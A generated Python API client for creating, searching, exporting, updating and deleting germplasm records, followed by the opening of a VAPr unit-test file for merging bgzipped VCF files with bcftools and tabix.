'/core/germplasm', 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='ObjectUriResponse', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
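    # Illustrative usage sketch (not part of the generated file; the token
    # value is an assumption): since the Authorization header handling above
    # is commented out, authentication is expected to be carried by the
    # ApiClient itself, e.g.
    #
    #     client = ApiClient()
    #     client.set_default_header('Authorization', token)
    #     api = GermplasmApi(client)
    #     uri_response = api.create_germplasm(body=dto, check_only=True)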
def delete_germplasm(self, uri, **kwargs): # noqa: E501
"""Delete a germplasm # noqa: E501
# noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.delete_germplasm(uri, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str uri: Germplasm URI (required)
:param str authorization: Authentication token (required)
:param str accept_language: Request accepted language
:return: None
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.delete_germplasm_with_http_info(uri, **kwargs) # noqa: E501
else:
(data) = self.delete_germplasm_with_http_info(uri, **kwargs) # noqa: E501
return data
def delete_germplasm_with_http_info(self, uri, **kwargs): # noqa: E501
"""Delete a germplasm # noqa: E501
# noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.delete_germplasm_with_http_info(uri, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str uri: Germplasm URI (required)
:param str authorization: Authentication token (required)
:param str accept_language: Request accepted language
:return: None
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['uri', ] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method delete_germplasm" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'uri' is set
if ('uri' not in params or
params['uri'] is None):
raise ValueError("Missing the required parameter `uri` when calling `delete_germplasm`") # noqa: E501
collection_formats = {}
path_params = {}
if 'uri' in params:
path_params['uri'] = params['uri'] # noqa: E501
query_params = []
header_params = {}
#if 'authorization' in params:
# header_params['Authorization'] = params['authorization'] # noqa: E501
#if 'accept_language' in params:
# header_params['Accept-Language'] = params['accept_language'] # noqa: E501
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json']) # noqa: E501
# Authentication setting
auth_settings = [] # noqa: E501
return self.api_client.call_api(
'/core/germplasm/{uri}', 'DELETE',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type=None, # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def export_germplasm(self, **kwargs): # noqa: E501
"""export germplasm # noqa: E501
# noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.export_germplasm(async_req=True)
>>> result = thread.get()
:param async_req bool
:param str authorization: Authentication token (required)
:param str uri: Regex pattern for filtering list by uri
:param str rdf_type: Search by type
:param str name: Regex pattern for filtering list by name and synonyms
:param str code: Regex pattern for filtering list by code
:param int production_year: Search by productionYear
:param str species: Search by species
:param str variety: Search by variety
:param str accession: Search by accession
:param str institute: Search by institute
:param str experiment: Search by experiment
:param str metadata: Search by metadata
:param list[str] order_by: List of fields to sort as an array of fieldName=asc|desc
:param str accept_language: Request accepted language
:return: None
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.export_germplasm_with_http_info(**kwargs) # noqa: E501
else:
(data) = self.export_germplasm_with_http_info(**kwargs) # noqa: E501
return data
def export_germplasm_with_http_info(self, **kwargs): # noqa: E501
"""export germplasm # noqa: E501
# noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.export_germplasm_with_http_info(async_req=True)
>>> result = thread.get()
:param async_req bool
:param str authorization: Authentication token (required)
:param str uri: Regex pattern for filtering list by uri
:param str rdf_type: Search by type
:param str name: Regex pattern for filtering list by name and synonyms
:param str code: Regex pattern for filtering list by code
:param int production_year: Search by productionYear
:param str species: Search by species
:param str variety: Search by variety
:param str accession: Search by accession
:param str institute: Search by institute
:param str experiment: Search by experiment
:param str metadata: Search by metadata
:param list[str] order_by: List of fields to sort as an array of fieldName=asc|desc
:param str accept_language: Request accepted language
:return: None
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['uri', 'rdf_type', 'name', 'code', 'production_year', 'species', 'variety', 'accession', 'institute', 'experiment', 'metadata', 'order_by', ] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method export_germplasm" % key
)
params[key] = val
del params['kwargs']
collection_formats = {}
path_params = {}
query_params = []
if 'uri' in params:
query_params.append(('uri', params['uri'])) # noqa: E501
if 'rdf_type' in params:
query_params.append(('rdf_type', params['rdf_type'])) # noqa: E501
if 'name' in params:
query_params.append(('name', params['name'])) # noqa: E501
if 'code' in params:
query_params.append(('code', params['code'])) # noqa: E501
if 'production_year' in params:
query_params.append(('production_year', params['production_year'])) # noqa: E501
if 'species' in params:
query_params.append(('species', params['species'])) # noqa: E501
if 'variety' in params:
query_params.append(('variety', params['variety'])) # noqa: E501
if 'accession' in params:
query_params.append(('accession', params['accession'])) # noqa: E501
if 'institute' in params:
query_params.append(('institute', params['institute'])) # noqa: E501
if 'experiment' in params:
query_params.append(('experiment', params['experiment'])) # noqa: E501
if 'metadata' in params:
query_params.append(('metadata', params['metadata'])) # noqa: E501
if 'order_by' in params:
query_params.append(('order_by', params['order_by'])) # noqa: E501
collection_formats['order_by'] = 'multi' # noqa: E501
header_params = {}
#if 'authorization' in params:
# header_params['Authorization'] = params['authorization'] # noqa: E501
#if 'accept_language' in params:
# header_params['Accept-Language'] = params['accept_language'] # noqa: E501
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['text/plain']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json']) # noqa: E501
# Authentication setting
auth_settings = [] # noqa: E501
return self.api_client.call_api(
'/core/germplasm/export', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type=None, # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
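    # Illustrative usage sketch (not part of the generated file; the filter
    # values are assumptions): the export endpoint takes the same regex and
    # exact-match filters as the germplasm search and returns text/plain
    # rather than JSON, e.g.
    #
    #     csv_text = api.export_germplasm(name="^Zea", production_year=2020,
    #                                     order_by=["name=asc"])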
def export_germplasm_by_ur_is(self, **kwargs): # noqa: E501
"""export germplasm by list of uris # noqa: E501
# noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.export_germplasm_by_ur_is(async_req=True)
>>> result = thread.get()
:param async_req bool
:param str authorization: Authentication token (required)
:param URIsListPostDTO body: List of germplasm URI
:param str accept_language: Request accepted language
:return: None
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.export_germplasm_by_ur_is_with_http_info(**kwargs) # noqa: E501
else:
(data) = self.export_germplasm_by_ur_is_with_http_info(**kwargs) # noqa: E501
return data
def export_germplasm_by_ur_is_with_http_info(self, **kwargs): # noqa: E501
"""export germplasm by list of uris # noqa: E501
# noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.export_germplasm_by_ur_is_with_http_info(async_req=True)
>>> result = thread.get()
:param async_req bool
:param str authorization: Authentication token (required)
:param URIsListPostDTO body: List of germplasm URI
:param str accept_language: Request accepted language
:return: None
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['body', ] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method export_germplasm_by_ur_is" % key
)
params[key] = val
del params['kwargs']
collection_formats = {}
path_params = {}
query_params = []
header_params = {}
#if 'authorization' in params:
# header_params['Authorization'] = params['authorization'] # noqa: E501
#if 'accept_language' in params:
# header_params['Accept-Language'] = params['accept_language'] # noqa: E501
form_params = []
local_var_files = {}
body_params = None
if 'body' in params:
body_params = params['body']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['text/plain']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json']) # noqa: E501
# Authentication setting
auth_settings = [] # noqa: E501
return self.api_client.call_api(
'/core/germplasm/export_by_uris', 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type=None, # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def get_germplasm(self, uri, **kwargs): # noqa: E501
"""Get a germplasm # noqa: E501
# noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_germplasm(uri, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str uri: germplasm URI (required)
:param str authorization: Authentication token (required)
:param str accept_language: Request accepted language
:return: GermplasmGetSingleDTO
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.get_germplasm_with_http_info(uri, **kwargs) # noqa: E501
else:
(data) = self.get_germplasm_with_http_info(uri, **kwargs) # noqa: E501
return data
def get_germplasm_with_http_info(self, uri, **kwargs): # noqa: E501
"""Get a germplasm # noqa: E501
# noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_germplasm_with_http_info(uri, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str uri: germplasm URI (required)
:param str authorization: Authentication token (required)
:param str accept_language: Request accepted language
:return: GermplasmGetSingleDTO
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['uri', ] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method get_germplasm" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'uri' is set
if ('uri' not in params or
params['uri'] is None):
raise ValueError("Missing the required parameter `uri` when calling `get_germplasm`") # noqa: E501
collection_formats = {}
path_params = {}
if 'uri' in params:
path_params['uri'] = params['uri'] # noqa: E501
query_params = []
header_params = {}
#if 'authorization' in params:
# header_params['Authorization'] = params['authorization'] # noqa: E501
#if 'accept_language' in params:
# header_params['Accept-Language'] = params['accept_language'] # noqa: E501
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# Authentication setting
auth_settings = [] # noqa: E501
return self.api_client.call_api(
'/core/germplasm/{uri}', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='GermplasmGetSingleDTO', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def get_germplasm_experiments(self, uri, **kwargs): # noqa: E501
"""Get experiments where a germplasm has been used # noqa: E501
# noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_germplasm_experiments(uri, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str uri: germplasm URI (required)
:param str authorization: Authentication token (required)
:param str name: Regex pattern for filtering experiments by name
:param list[str] order_by: List of fields to sort as an array of fieldName=asc|desc
:param int page: Page number
:param int page_size: Page size
:param str accept_language: Request accepted language
:return: list[ExperimentGetListDTO]
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.get_germplasm_experiments_with_http_info(uri, **kwargs) # noqa: E501
else:
(data) = self.get_germplasm_experiments_with_http_info(uri, **kwargs) # noqa: E501
return data
def get_germplasm_experiments_with_http_info(self, uri, **kwargs): # noqa: E501
"""Get experiments where a germplasm has been used # noqa: E501
# noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_germplasm_experiments_with_http_info(uri, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str uri: germplasm URI (required)
:param str authorization: Authentication token (required)
:param str name: Regex pattern for filtering experiments by name
:param list[str] order_by: List of fields to sort as an array of fieldName=asc|desc
:param int page: Page number
:param int page_size: Page size
:param str accept_language: Request accepted language
:return: list[ExperimentGetListDTO]
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['uri', 'name', 'order_by', 'page', 'page_size', ] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method get_germplasm_experiments" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'uri' is set
if ('uri' not in params or
params['uri'] is None):
raise ValueError("Missing the required parameter `uri` when calling `get_germplasm_experiments`") # noqa: E501
if 'page' in params and params['page'] < 0: # noqa: E501
raise ValueError("Invalid value for parameter `page` when calling `get_germplasm_experiments`, must be a value greater than or equal to `0`") # noqa: E501
if 'page_size' in params and params['page_size'] < 0: # noqa: E501
raise ValueError("Invalid value for parameter `page_size` when calling `get_germplasm_experiments`, must be a value greater than or equal to `0`") # noqa: E501
collection_formats = {}
path_params = {}
if 'uri' in params:
path_params['uri'] = params['uri'] # noqa: E501
query_params = []
if 'name' in params:
query_params.append(('name', params['name'])) # noqa: E501
if 'order_by' in params:
query_params.append(('order_by', params['order_by'])) # noqa: E501
collection_formats['order_by'] = 'multi' # noqa: E501
if 'page' in params:
query_params.append(('page', params['page'])) # noqa: E501
if 'page_size' in params:
query_params.append(('page_size', params['page_size'])) # noqa: E501
header_params = {}
#if 'authorization' in params:
# header_params['Authorization'] = params['authorization'] # noqa: E501
#if 'accept_language' in params:
# header_params['Accept-Language'] = params['accept_language'] # noqa: E501
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json']) # noqa: E501
# Authentication setting
auth_settings = [] # noqa: E501
return self.api_client.call_api(
'/core/germplasm/{uri}/experiments', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='list[ExperimentGetListDTO]', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
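    # Illustrative call (hypothetical URI and filter values, not taken from the
    # API docs): `order_by` entries use the `fieldName=asc|desc` form and,
    # because the collection format is 'multi', each list item becomes its own
    # `order_by=` query parameter:
    #   api.get_germplasm_experiments("dev:germplasm/g1",
    #                                 name="drought.*",
    #                                 order_by=["name=asc"],
    #                                 page=0, page_size=20)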
def get_germplasms_by_uri(self, uris, **kwargs): # noqa: E501
"""Get a list of germplasms by their URIs # noqa: E501
# noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_germplasms_by_uri(uris, async_req=True)
>>> result = thread.get()
:param async_req bool
:param list[str] uris: Germplasms URIs (required)
:param str authorization: Authentication token (required)
:param str accept_language: Request accepted language
:return: list[GermplasmGetAllDTO]
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.get_germplasms_by_uri_with_http_info(uris, **kwargs) # noqa: E501
else:
(data) = self.get_germplasms_by_uri_with_http_info(uris, **kwargs) # noqa: E501
return data
def get_germplasms_by_uri_with_http_info(self, uris, **kwargs): # noqa: E501
"""Get a list of germplasms by their URIs # noqa: E501
# noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_germplasms_by_uri_with_http_info(uris, async_req=True)
>>> result = thread.get()
:param async_req bool
:param list[str] uris: Germplasms URIs (required)
:param str authorization: Authentication token (required)
:param str accept_language: Request accepted language
:return: list[GermplasmGetAllDTO]
If the method is called asynchronously,
returns the request thread.
"""
        all_params = ['uris', 'authorization', 'accept_language', ]  # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method get_germplasms_by_uri" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'uris' is set
if ('uris' not in params or
params['uris'] is None):
raise ValueError("Missing the required parameter `uris` when calling `get_germplasms_by_uri`") # noqa: E501
collection_formats = {}
path_params = {}
query_params = []
if 'uris' in params:
query_params.append(('uris', params['uris'])) # noqa: E501
collection_formats['uris'] = 'multi' # noqa: E501
header_params = {}
        if 'authorization' in params:
            header_params['Authorization'] = params['authorization']  # noqa: E501
        if 'accept_language' in params:
            header_params['Accept-Language'] = params['accept_language']  # noqa: E501
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json']) # noqa: E501
# Authentication setting
auth_settings = [] # noqa: E501
return self.api_client.call_api(
'/core/germplasm/by_uris', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='list[GermplasmGetAllDTO]', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
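    # Illustrative call (hypothetical URIs): with collection format 'multi',
    # the list is serialized as repeated query parameters, e.g.
    # `?uris=dev:germplasm/g1&uris=dev:germplasm/g2`:
    #   germplasms = api.get_germplasms_by_uri(["dev:germplasm/g1",
    #                                           "dev:germplasm/g2"])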
def search_germplasm(self, **kwargs): # noqa: E501
"""Search germplasm # noqa: E501
# noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.search_germplasm(async_req=True)
>>> result = thread.get()
:param async_req bool
:param str authorization: Authentication token (required)
:param str uri: Regex pattern for filtering list by uri
:param str rdf_type: Search by type
:param str name: Regex pattern for filtering list by name and synonyms
:param str code: Regex pattern for filtering list by code
:param int production_year: Search by production year
:param str species: Search by species
:param str variety: Search by variety
:param str accession: Search by accession
:param str institute: Search by institute
:param str experiment: Search by experiment
:param str metadata: Search by metadata
:param list[str] order_by: List of fields to sort as an array of fieldName=asc|desc
:param int page: Page number
:param int page_size: Page size
:param str accept_language: Request accepted language
:return: list[GermplasmGetAllDTO]
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.search_germplasm_with_http_info(**kwargs) # noqa: E501
else:
(data) = self.search_germplasm_with_http_info(**kwargs) # noqa: E501
return data
def search_germplasm_with_http_info(self, **kwargs): # noqa: E501
"""Search germplasm # noqa: E501
# noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.search_germplasm_with_http_info(async_req=True)
>>> result = thread.get()
:param async_req bool
:param str authorization: Authentication token (required)
:param str uri: Regex pattern for filtering list by uri
:param str rdf_type: Search by type
:param str name: Regex pattern for filtering list by name and synonyms
:param str code: Regex pattern for filtering list by code
:param int production_year: Search by production year
:param str species: Search by species
:param str variety: Search by variety
:param str accession: Search by accession
:param str institute: Search by institute
:param str experiment: Search by experiment
:param str metadata: Search by metadata
:param list[str] order_by: List of fields to sort as an array of fieldName=asc|desc
:param int page: Page number
:param int page_size: Page size
:param str accept_language: Request accepted language
:return: list[GermplasmGetAllDTO]
If the method is called asynchronously,
returns the request thread.
"""
        all_params = ['uri', 'rdf_type', 'name', 'code', 'production_year', 'species', 'variety', 'accession', 'institute', 'experiment', 'metadata', 'order_by', 'page', 'page_size', 'authorization', 'accept_language', ]  # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method search_germplasm" % key
)
params[key] = val
del params['kwargs']
if 'page' in params and params['page'] < 0: # noqa: E501
raise ValueError("Invalid value for parameter `page` when calling `search_germplasm`, must be a value greater than or equal to `0`") # noqa: E501
if 'page_size' in params and params['page_size'] < 0: # noqa: E501
raise ValueError("Invalid value for parameter `page_size` when calling `search_germplasm`, must be a value greater than or equal to `0`") # noqa: E501
collection_formats = {}
path_params = {}
query_params = []
if 'uri' in params:
query_params.append(('uri', params['uri'])) # noqa: E501
if 'rdf_type' in params:
query_params.append(('rdf_type', params['rdf_type'])) # noqa: E501
if 'name' in params:
query_params.append(('name', params['name'])) # noqa: E501
if 'code' in params:
query_params.append(('code', params['code'])) # noqa: E501
if 'production_year' in params:
query_params.append(('production_year', params['production_year'])) # noqa: E501
if 'species' in params:
query_params.append(('species', params['species'])) # noqa: E501
if 'variety' in params:
query_params.append(('variety', params['variety'])) # noqa: E501
if 'accession' in params:
query_params.append(('accession', params['accession'])) # noqa: E501
if 'institute' in params:
query_params.append(('institute', params['institute'])) # noqa: E501
if 'experiment' in params:
query_params.append(('experiment', params['experiment'])) # noqa: E501
if 'metadata' in params:
query_params.append(('metadata', params['metadata'])) # noqa: E501
if 'order_by' in params:
query_params.append(('order_by', params['order_by'])) # noqa: E501
collection_formats['order_by'] = 'multi' # noqa: E501
if 'page' in params:
query_params.append(('page', params['page'])) # noqa: E501
if 'page_size' in params:
query_params.append(('page_size', params['page_size'])) # noqa: E501
header_params = {}
        if 'authorization' in params:
            header_params['Authorization'] = params['authorization']  # noqa: E501
        if 'accept_language' in params:
            header_params['Accept-Language'] = params['accept_language']  # noqa: E501
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json']) # noqa: E501
# Authentication setting
auth_settings = [] # noqa: E501
return self.api_client.call_api(
'/core/germplasm', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='list[GermplasmGetAllDTO]', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
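    # Illustrative search (hypothetical filter values): every filter is
    # optional, and the string filters documented as regex patterns (`uri`,
    # `name`, `code`) accept regular expressions:
    #   hits = api.search_germplasm(name="^Zea.*", production_year=2020,
    #                               page=0, page_size=50)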
def update_germplasm(self, **kwargs): # noqa: E501
"""Update a germplasm # noqa: E501
# noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.update_germplasm(async_req=True)
>>> result = thread.get()
:param async_req bool
:param str authorization: Authentication token (required)
:param GermplasmUpdateDTO body: Germplasm description
:param str accept_language: Request accepted language
:return: ObjectUriResponse
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.update_germplasm_with_http_info(**kwargs) # noqa: E501
else:
(data) = self.update_germplasm_with_http_info(**kwargs) # noqa: E501
return data
def update_germplasm_with_http_info(self, **kwargs): # noqa: E501
"""Update a germplasm # noqa: E501
# noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.update_germplasm_with_http_info(async_req=True)
>>> result = thread.get()
:param async_req bool
:param str authorization: Authentication token (required)
:param GermplasmUpdateDTO body: Germplasm description
:param str accept_language: Request accepted language
:return: ObjectUriResponse
If the method is called asynchronously,
returns the request thread.
"""
        all_params = ['body', 'authorization', 'accept_language', ]  # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method update_germplasm" % key
)
params[key] = val
del params['kwargs']
collection_formats = {}
path_params = {}
query_params = []
header_params = {}
        if 'authorization' in params:
            header_params['Authorization'] = params['authorization']  # noqa: E501
        if 'accept_language' in params:
            header_params['Accept-Language'] = params['accept_language']  # noqa: E501
form_params = []
local_var_files = {}
body_params = None
if 'body' in params:
body_params = params['body']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json']) # noqa: E501
# Authentication setting
auth_settings = [] # noqa: E501
return self.api_client.call_api(
'/core/germplasm', 'PUT',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='ObjectUriResponse', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
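
# A minimal end-to-end usage sketch. The enclosing class and package names are
# not visible in this excerpt, so the names below are assumptions based on the
# usual swagger-codegen layout (an ApiClient plus a per-tag API class); adjust
# them to the real generated package before running anything:
#
#   from swagger_client import ApiClient          # assumed module/class names
#   from swagger_client.api import GermplasmApi   # assumed module/class names
#
#   api = GermplasmApi(ApiClient())
#   hits = api.search_germplasm(name="^Zea.*", page=0, page_size=10)
#   updated = api.update_germplasm(body=my_update_dto)  # hypothetical DTO instance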
# File: VAPr/tests/test_vcf_merging.py (repo: ucsd-ccbb/VAPr, license: MIT)
# standard libraries
import os
import tempfile
import unittest
# third-party libraries
import vcf
# project-specific libraries
import VAPr.vcf_merging as ns_test
def help_get_test_file_info():
base_dir = os.getcwd()
test_file_dir = os.path.join(base_dir, 'test_files/test_input_dir/G1000')
test_bgzipped_fps = [os.path.join(test_file_dir, "HG00096.vcf.gz"),
os.path.join(test_file_dir, "HG00097.vcf.gz")]
return test_file_dir, test_bgzipped_fps
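

# A minimal sketch (NOT VAPr's actual implementation) of the three command
# builders exercised by the _build_* tests below; the expected strings come
# straight from those tests' assertions.
def _sketch_build_merge_vcf_command_str(bgzipped_vcf_fps):
    # bcftools merge accepts any number of bgzipped-and-indexed VCF paths
    return " ".join(["bcftools", "merge"] + list(bgzipped_vcf_fps))


def _sketch_build_bgzip_vcf_command_str(vcf_fp):
    # -c writes the BGZF-compressed output to stdout so the caller can redirect it
    return "bgzip -c {0}".format(vcf_fp)


def _sketch_build_index_vcf_command_str(bgzipped_vcf_fp):
    # -p vcf applies tabix's VCF preset when building the .tbi index
    return "tabix -p vcf {0}".format(bgzipped_vcf_fp)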
class TestFunctions(unittest.TestCase):
HG00096_VCF_CONTENTS = """##fileformat=VCFv4.1
##FILTER=<ID=PASS,Description="All filters passed">
##fileDate=20150218
##reference=ftp://ftp.1000genomes.ebi.ac.uk//vol1/ftp/technical/reference/phase2_reference_assembly_sequence/hs37d5.fa.gz
##source=1000GenomesPhase3Pipeline
##contig=<ID=1,assembly=b37,length=249250621>
##contig=<ID=2,assembly=b37,length=243199373>
##contig=<ID=3,assembly=b37,length=198022430>
##contig=<ID=4,assembly=b37,length=191154276>
##contig=<ID=5,assembly=b37,length=180915260>
##contig=<ID=6,assembly=b37,length=171115067>
##contig=<ID=7,assembly=b37,length=159138663>
##contig=<ID=8,assembly=b37,length=146364022>
##contig=<ID=9,assembly=b37,length=141213431>
##contig=<ID=10,assembly=b37,length=135534747>
##contig=<ID=11,assembly=b37,length=135006516>
##contig=<ID=12,assembly=b37,length=133851895>
##contig=<ID=13,assembly=b37,length=115169878>
##contig=<ID=14,assembly=b37,length=107349540>
##contig=<ID=15,assembly=b37,length=102531392>
##contig=<ID=16,assembly=b37,length=90354753>
##contig=<ID=17,assembly=b37,length=81195210>
##contig=<ID=18,assembly=b37,length=78077248>
